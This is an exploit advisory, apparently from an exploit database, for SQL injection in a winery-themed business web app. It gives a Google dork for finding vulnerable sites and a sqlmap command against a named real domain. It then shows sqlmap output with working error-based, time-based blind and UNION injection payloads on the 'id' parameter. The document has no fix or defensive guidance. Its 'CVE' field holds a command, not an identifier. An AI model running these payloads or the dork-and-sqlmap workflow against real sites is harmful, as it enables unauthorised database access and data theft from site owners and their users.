##################################################
# Exploit Title: Business Web Apps SQLi Vuln.
# Google Dork: intitle:"US Elite Winery" inurl:"index.php?id=1"
# Date: 04.06.2017
# Exploit Author: HocaXD
# Version: V.1
# Category: Web Apps
# Tested on: Parrot Security OS / Google Chrome
##################################################
# CVE : sqlmap -u "http://www.uselitewine.com/index.php?id=1'" --dbs
[+] sqlmap identified the following injection point(s) with a total of 2109 HTTP(s) requests:
---
Parameter: id (GET)
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
    Payload: id=-5821 OR 1 GROUP BY CONCAT(0x71717a7a71,(SELECT (CASE WHEN (2431=2431) THEN 1 ELSE 0 END)),0x71706b7071,FLOOR(RAND(0)*2)) HAVING MIN(0)#

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    Payload: id=(CASE WHEN (5685=5685) THEN SLEEP(5) ELSE 5685 END)

    Type: UNION query
    Title: MySQL UNION query (random number) - 29 columns
    Payload: id=-4568 UNION ALL SELECT 5100,CONCAT(0x71717a7a71,0x4e676351796443686f764f6a65656f67704a746d6856456c7a4f67504868626361714d47676c5662,0x71706b7071),5100,5100,5100,5100,5100,5100,5100,5100,5100,5100,5100,5100,5100,5100,5100,5100,5100,5100,5100,5100,5100,5100,5100,5100,5100,5100,5100#
---
##################################################